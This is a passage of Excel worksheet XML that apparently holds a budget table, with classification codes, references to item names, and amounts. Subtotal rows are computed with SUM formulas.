      <c r="B83" s="705" t="s">
        <v>1004</v>
      </c>
      <c r="C83" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="84" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A84" s="705">
        <v>2010805</v>
      </c>
      <c r="B84" s="705" t="s">
        <v>1005</v>
      </c>
      <c r="C84" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="85" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A85" s="705">
        <v>2010806</v>
      </c>
      <c r="B85" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C85" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="86" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A86" s="705">
        <v>2010850</v>
      </c>
      <c r="B86" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C86" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="87" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A87" s="705">
        <v>2010899</v>
      </c>
      <c r="B87" s="705" t="s">
        <v>1006</v>
      </c>
      <c r="C87" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="88" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A88" s="705">
        <v>20109</v>
      </c>
      <c r="B88" s="706" t="s">
        <v>1007</v>
      </c>
      <c r="C88" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="89" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A89" s="705">
        <v>2010901</v>
      </c>
      <c r="B89" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C89" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="90" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A90" s="705">
        <v>2010902</v>
      </c>
      <c r="B90" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C90" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="91" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A91" s="705">
        <v>2010903</v>
      </c>
      <c r="B91" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C91" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="92" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A92" s="705">
        <v>2010905</v>
      </c>
      <c r="B92" s="705" t="s">
        <v>1008</v>
      </c>
      <c r="C92" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="93" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A93" s="705">
        <v>2010907</v>
      </c>
      <c r="B93" s="705" t="s">
        <v>1009</v>
      </c>
      <c r="C93" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="94" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A94" s="705">
        <v>2010908</v>
      </c>
      <c r="B94" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C94" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="95" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A95" s="705">
        <v>2010909</v>
      </c>
      <c r="B95" s="705" t="s">
        <v>1010</v>
      </c>
      <c r="C95" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="96" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A96" s="705">
        <v>2010910</v>
      </c>
      <c r="B96" s="705" t="s">
        <v>1011</v>
      </c>
      <c r="C96" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="97" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A97" s="705">
        <v>2010911</v>
      </c>
      <c r="B97" s="705" t="s">
        <v>1012</v>
      </c>
      <c r="C97" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="98" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A98" s="705">
        <v>2010912</v>
      </c>
      <c r="B98" s="705" t="s">
        <v>1013</v>
      </c>
      <c r="C98" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="99" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A99" s="705">
        <v>2010950</v>
      </c>
      <c r="B99" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C99" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="100" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A100" s="705">
        <v>2010999</v>
      </c>
      <c r="B100" s="705" t="s">
        <v>1014</v>
      </c>
      <c r="C100" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="101" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A101" s="705">
        <v>20111</v>
      </c>
      <c r="B101" s="706" t="s">
        <v>1015</v>
      </c>
      <c r="C101" s="269">
        <f>SUM(C102:C109)</f>
        <v>1750</v>
      </c>
    </row>
    <row r="102" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A102" s="705">
        <v>2011101</v>
      </c>
      <c r="B102" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C102" s="707">
        <v>1700</v>
      </c>
    </row>
    <row r="103" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A103" s="705">
        <v>2011102</v>
      </c>
      <c r="B103" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C103" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="104" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A104" s="705">
        <v>2011103</v>
      </c>
      <c r="B104" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C104" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="105" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A105" s="705">
        <v>2011104</v>
      </c>
      <c r="B105" s="705" t="s">
        <v>1016</v>
      </c>
      <c r="C105" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="106" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A106" s="705">
        <v>2011105</v>
      </c>
      <c r="B106" s="705" t="s">
        <v>1017</v>
      </c>
      <c r="C106" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="107" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A107" s="705">
        <v>2011106</v>
      </c>
      <c r="B107" s="705" t="s">
        <v>1018</v>
      </c>
      <c r="C107" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="108" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A108" s="705">
        <v>2011150</v>
      </c>
      <c r="B108" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C108" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="109" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A109" s="705">
        <v>2011199</v>
      </c>
      <c r="B109" s="705" t="s">
        <v>1019</v>
      </c>
      <c r="C109" s="707">
        <v>50</v>
      </c>
    </row>
    <row r="110" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A110" s="705">
        <v>20113</v>
      </c>
      <c r="B110" s="706" t="s">
        <v>1020</v>
      </c>
      <c r="C110" s="269">
        <f>SUM(C111:C120)</f>
        <v>656</v>
      </c>
    </row>
    <row r="111" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A111" s="705">
        <v>2011301</v>
      </c>
      <c r="B111" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C111" s="707">
        <v>400</v>
      </c>
    </row>
    <row r="112" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A112" s="705">
        <v>2011302</v>
      </c>
      <c r="B112" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C112" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="113" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A113" s="705">
        <v>2011303</v>
      </c>
      <c r="B113" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C113" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="114" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A114" s="705">
        <v>2011304</v>
      </c>
      <c r="B114" s="705" t="s">
        <v>1021</v>
      </c>
      <c r="C114" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="115" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A115" s="705">
        <v>2011305</v>
      </c>
      <c r="B115" s="705" t="s">
        <v>1022</v>
      </c>
      <c r="C115" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="116" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A116" s="705">
        <v>2011306</v>
      </c>
      <c r="B116" s="705" t="s">
        <v>1023</v>
      </c>
      <c r="C116" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="117" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A117" s="705">
        <v>2011307</v>
      </c>
      <c r="B117" s="705" t="s">
        <v>1024</v>
      </c>
      <c r="C117" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="118" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A118" s="705">
        <v>2011308</v>
      </c>
      <c r="B118" s="705" t="s">
        <v>1025</v>
      </c>
      <c r="C118" s="707">
        <v>30</v>
      </c>
    </row>
    <row r="119" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A119" s="705">
        <v>2011350</v>
      </c>
      <c r="B119" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C119" s="707">
        <v>206</v>
      </c>
    </row>
    <row r="120" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A120" s="705">
        <v>2011399</v>
      </c>
      <c r="B120" s="705" t="s">
        <v>1026</v>
      </c>
      <c r="C120" s="707">
        <v>20</v>
      </c>
    </row>
    <row r="121" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A121" s="705">
        <v>20114</v>
      </c>
      <c r="B121" s="706" t="s">
        <v>1027</v>
      </c>
      <c r="C121" s="269">
        <f>SUM(C122:C132)</f>
        <v>7</v>
      </c>
    </row>
    <row r="122" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A122" s="705">
        <v>2011401</v>
      </c>
      <c r="B122" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C122" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="123" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A123" s="705">
        <v>2011402</v>
      </c>
      <c r="B123" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C123" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="124" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A124" s="705">
        <v>2011403</v>
      </c>
      <c r="B124" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C124" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="125" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A125" s="705">
        <v>2011404</v>
      </c>
      <c r="B125" s="705" t="s">
        <v>1028</v>
      </c>
      <c r="C125" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="126" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A126" s="705">
        <v>2011405</v>
      </c>
      <c r="B126" s="705" t="s">
        <v>1029</v>
      </c>
      <c r="C126" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="127" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A127" s="705">
        <v>2011408</v>
      </c>
      <c r="B127" s="705" t="s">
        <v>1030</v>
      </c>
      <c r="C127" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="128" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A128" s="705">
        <v>2011409</v>
      </c>
      <c r="B128" s="705" t="s">
        <v>1031</v>
      </c>
      <c r="C128" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="129" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A129" s="705">
        <v>2011410</v>
      </c>
      <c r="B129" s="705" t="s">
        <v>1032</v>
      </c>
      <c r="C129" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="130" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A130" s="705">
        <v>2011411</v>
      </c>
      <c r="B130" s="705" t="s">
        <v>1033</v>
      </c>
      <c r="C130" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="131" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A131" s="705">
        <v>2011450</v>
      </c>
      <c r="B131" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C131" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="132" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A132" s="705">
        <v>2011499</v>
      </c>
      <c r="B132" s="705" t="s">
        <v>1034</v>
      </c>
      <c r="C132" s="707">
        <v>7</v>
      </c>
    </row>
    <row r="133" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A133" s="705">
        <v>20123</v>
      </c>
      <c r="B133" s="706" t="s">
        <v>1035</v>
      </c>
      <c r="C133" s="269">
        <f>SUM(C134:C139)</f>
        <v>171</v>
      </c>
    </row>
    <row r="134" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A134" s="705">
        <v>2012301</v>
      </c>
      <c r="B134" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C134" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="135" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A135" s="705">
        <v>2012302</v>
      </c>
      <c r="B135" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C135" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="136" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A136" s="705">
        <v>2012303</v>
      </c>
      <c r="B136" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C136" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="137" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A137" s="705">
        <v>2012304</v>
      </c>
      <c r="B137" s="705" t="s">
        <v>1036</v>
      </c>
      <c r="C137" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="138" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A138" s="705">
        <v>2012350</v>
      </c>
      <c r="B138" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C138" s="707">
        <v>139</v>
      </c>
    </row>
    <row r="139" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A139" s="705">
        <v>2012399</v>
      </c>
      <c r="B139" s="705" t="s">
        <v>1037</v>
      </c>
      <c r="C139" s="707">
        <v>32</v>
      </c>
    </row>
    <row r="140" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A140" s="705">
        <v>20125</v>
      </c>
      <c r="B140" s="706" t="s">
        <v>1038</v>
      </c>
      <c r="C140" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="141" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A141" s="705">
        <v>2012501</v>
      </c>
      <c r="B141" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C141" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="142" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A142" s="705">
        <v>2012502</v>
      </c>
      <c r="B142" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C142" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="143" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A143" s="705">
        <v>2012503</v>
      </c>
      <c r="B143" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C143" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="144" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A144" s="705">
        <v>2012504</v>
      </c>
      <c r="B144" s="705" t="s">
        <v>1039</v>
      </c>
      <c r="C144" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="145" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A145" s="705">
        <v>2012505</v>
      </c>
      <c r="B145" s="705" t="s">
        <v>1040</v>
      </c>
      <c r="C145" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="146" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A146" s="705">
        <v>2012550</v>
      </c>
      <c r="B146" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C146" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="147" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A147" s="705">
        <v>2012599</v>
      </c>
      <c r="B147" s="705" t="s">
        <v>1041</v>
      </c>
      <c r="C147" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="148" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A148" s="705">
        <v>20126</v>
      </c>
      <c r="B148" s="706" t="s">
        <v>1042</v>
      </c>
      <c r="C148" s="269">
        <f>SUM(C149:C153)</f>
        <v>225</v>
      </c>
    </row>
    <row r="149" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A149" s="705">
        <v>2012601</v>
      </c>
      <c r="B149" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C149" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="150" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A150" s="705">
        <v>2012602</v>
      </c>
      <c r="B150" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C150" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="151" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A151" s="705">
        <v>2012603</v>
      </c>
      <c r="B151" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C151" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="152" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A152" s="705">
        <v>2012604</v>
      </c>
      <c r="B152" s="705" t="s">
        <v>1043</v>
      </c>
      <c r="C152" s="707">
        <v>225</v>
      </c>
    </row>
    <row r="153" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A153" s="705">
        <v>2012699</v>
      </c>
      <c r="B153" s="705" t="s">
        <v>1044</v>
      </c>
      <c r="C153" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="154" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A154" s="705">
        <v>20128</v>
      </c>
      <c r="B154" s="706" t="s">
        <v>1045</v>
      </c>
      <c r="C154" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="155" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A155" s="705">
        <v>2012801</v>
      </c>
      <c r="B155" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C155" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="156" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A156" s="705">
        <v>2012802</v>
      </c>
      <c r="B156" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C156" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="157" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A157" s="705">
        <v>2012803</v>
      </c>
      <c r="B157" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C157" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="158" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A158" s="705">
        <v>2012804</v>
      </c>
      <c r="B158" s="705" t="s">
        <v>970</v>
      </c>
      <c r="C158" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="159" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A159" s="705">
        <v>2012850</v>
      </c>
      <c r="B159" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C159" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="160" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A160" s="705">
        <v>2012899</v>
      </c>
      <c r="B160" s="705" t="s">
        <v>1046</v>
      </c>
      <c r="C160" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="161" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A161" s="705">
        <v>20129</v>
      </c>
      <c r="B161" s="706" t="s">
        <v>1047</v>
      </c>
      <c r="C161" s="269">
        <f>SUM(C162:C167)</f>
        <v>560</v>
      </c>
    </row>
    <row r="162" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A162" s="705">
        <v>2012901</v>
      </c>
      <c r="B162" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C162" s="707">
        <v>340</v>
      </c>
    </row>
    <row r="163" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A163" s="705">
        <v>2012902</v>
      </c>
      <c r="B163" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C163" s="707">
        <v>10</v>
      </c>
    </row>
    <row r="164" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A164" s="705">
        <v>2012903</v>
      </c>
      <c r="B164" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C164" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="165" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A165" s="705">
        <v>2012906</v>
      </c>
      <c r="B165" s="705" t="s">
        <v>1048</v>
      </c>
      <c r="C165" s="707">
        <v>180</v>
      </c>
    </row>
    <row r="166" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A166" s="705">
        <v>2012950</v>
      </c>
      <c r="B166" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C166" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="167" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A167" s="705">
        <v>2012999</v>
      </c>
      <c r="B167" s="705" t="s">
        <v>1049</v>
      </c>
      <c r="C167" s="707">
        <v>30</v>
      </c>
    </row>
    <row r="168" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A168" s="705">
        <v>20131</v>
      </c>
      <c r="B168" s="706" t="s">
        <v>1050</v>
      </c>
      <c r="C168" s="269">
        <f>SUM(C169:C174)</f>
        <v>1406</v>
      </c>
    </row>
    <row r="169" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A169" s="705">
        <v>2013101</v>
      </c>
      <c r="B169" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C169" s="707">
        <v>1100</v>
      </c>
    </row>
    <row r="170" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A170" s="705">
        <v>2013102</v>
      </c>
      <c r="B170" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C170" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="171" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A171" s="705">
        <v>2013103</v>
      </c>
      <c r="B171" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C171" s="707">
        <v>12</v>
      </c>
    </row>
    <row r="172" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A172" s="705">
        <v>2013105</v>
      </c>
      <c r="B172" s="705" t="s">
        <v>1051</v>
      </c>
      <c r="C172" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="173" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A173" s="705">
        <v>2013150</v>
      </c>
      <c r="B173" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C173" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="174" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A174" s="705">
        <v>2013199</v>
      </c>
      <c r="B174" s="705" t="s">
        <v>1052</v>
      </c>
      <c r="C174" s="707">
        <v>294</v>
      </c>
    </row>
    <row r="175" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A175" s="705">
        <v>20132</v>
      </c>
      <c r="B175" s="706" t="s">
        <v>1053</v>
      </c>
      <c r="C175" s="269">
        <f>SUM(C176:C181)</f>
        <v>772</v>
      </c>
    </row>
    <row r="176" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A176" s="705">
        <v>2013201</v>
      </c>
      <c r="B176" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C176" s="707">
        <v>560</v>
      </c>
    </row>
    <row r="177" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A177" s="705">
        <v>2013202</v>
      </c>
      <c r="B177" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C177" s="707">
        <v>12</v>
      </c>
    </row>
    <row r="178" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A178" s="705">
        <v>2013203</v>
      </c>
      <c r="B178" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C178" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="179" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A179" s="705">
        <v>2013204</v>
      </c>
      <c r="B179" s="705" t="s">
        <v>1054</v>
      </c>
      <c r="C179" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="180" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A180" s="705">
        <v>2013250</v>
      </c>
      <c r="B180" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C180" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="181" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A181" s="705">
        <v>2013299</v>
      </c>
      <c r="B181" s="705" t="s">
        <v>1055</v>
      </c>
      <c r="C181" s="707">
        <v>200</v>
      </c>
    </row>
    <row r="182" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A182" s="705">
        <v>20133</v>
      </c>
      <c r="B182" s="706" t="s">
        <v>1056</v>
      </c>
      <c r="C182" s="269">
        <f>SUM(C183:C188)</f>
        <v>511</v>
      </c>
    </row>
    <row r="183" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A183" s="705">
        <v>2013301</v>
      </c>
      <c r="B183" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C183" s="707">
        <v>400</v>
      </c>
    </row>
    <row r="184" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A184" s="705">
        <v>2013302</v>
      </c>
      <c r="B184" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C184" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="185" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A185" s="705">
        <v>2013303</v>
      </c>
      <c r="B185" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C185" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="186" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A186" s="705">
        <v>2013304</v>
      </c>
      <c r="B186" s="705" t="s">
        <v>1057</v>
      </c>
      <c r="C186" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="187" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A187" s="705">
        <v>2013350</v>
      </c>
      <c r="B187" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C187" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="188" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A188" s="705">
        <v>2013399</v>
      </c>
      <c r="B188" s="705" t="s">
        <v>1058</v>
      </c>
      <c r="C188" s="707">
        <v>111</v>
      </c>
    </row>
    <row r="189" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A189" s="705">
        <v>20134</v>
      </c>
      <c r="B189" s="706" t="s">
        <v>1059</v>
      </c>
      <c r="C189" s="269">
        <f>SUM(C190:C196)</f>
        <v>218</v>
      </c>
    </row>
    <row r="190" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A190" s="705">
        <v>2013401</v>
      </c>
      <c r="B190" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C190" s="707">
        <v>212</v>
      </c>
    </row>
    <row r="191" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A191" s="705">
        <v>2013402</v>
      </c>
      <c r="B191" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C191" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="192" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A192" s="705">
        <v>2013403</v>
      </c>
      <c r="B192" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C192" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="193" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A193" s="705">
        <v>2013404</v>
      </c>
      <c r="B193" s="705" t="s">
        <v>1060</v>
      </c>
      <c r="C193" s="707">
        <v>3</v>
      </c>
    </row>
    <row r="194" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A194" s="705">
        <v>2013405</v>
      </c>
      <c r="B194" s="705" t="s">
        <v>1061</v>
      </c>
      <c r="C194" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="195" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A195" s="705">
